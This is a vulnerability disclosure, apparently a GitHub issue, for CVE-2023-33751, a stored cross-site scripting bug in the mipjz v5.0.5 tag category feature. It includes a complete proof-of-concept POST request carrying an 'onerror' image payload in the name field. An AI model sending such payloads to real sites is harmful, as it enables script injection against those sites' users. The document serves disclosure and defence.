CVE-2023-33751: There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 · Issue #14 · sansanyun/mipjz

[Vulnerability Description]
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the tag category name field from categoryAdd.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/

[Affected Product Code Base]
v5.0.5

[Vulnerability Proof]

1. Check the code and find that /app/tag/controller/ApiAdminTagCategory.php does not check and filter the name parameter input by the user

2. Add a tag category, insert the js code at the name parameter: xss

   POST /index.php?s=/tag/ApiAdminTagCategory/categoryAdd HTTP/1.1 Host: 192.168.11.102 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 dataId: Content-Length: 286 Origin: http://192.168.11.102 Connection: close Referer: http://192.168.11.102/index.php?s=/admin/ Cookie: jERzUAUdppHHnews=2%2C1; jERzUAUdppHHproduct=1%2C3; csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

   {"pid":0,"name":"xss<img src onerror=alert(1)>","url_name":"aaa","seo_title":"","template":"tag.html","detail_template":"tagDetail.html","category_url":"/tag/<url_name>/","category_page_url":"<category_url>index_<page>.html","detail_url":"/tag/<id>.html","description":"","keywords":""}

3. Delete the label category created in the previous step, and any code will be executed in the pop-up prompt box